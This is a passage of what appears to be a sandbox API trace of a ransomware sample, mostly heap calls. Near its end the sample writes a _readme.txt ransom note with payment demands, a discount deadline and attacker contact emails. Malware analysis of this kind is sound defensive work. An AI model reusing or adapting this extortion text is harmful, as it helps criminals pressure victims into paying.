lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.934] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0200.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.934] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.934] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.934] PathFindFileNameW (pszPath="") returned="" [0200.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.934] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.935] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0200.935] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b67060 [0200.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.935] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.935] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0200.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.935] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0200.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.936] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.936] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.936] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.936] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.937] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.937] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.937] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.937] FindClose (in: hFindFile=0x32ef1f8 | out: 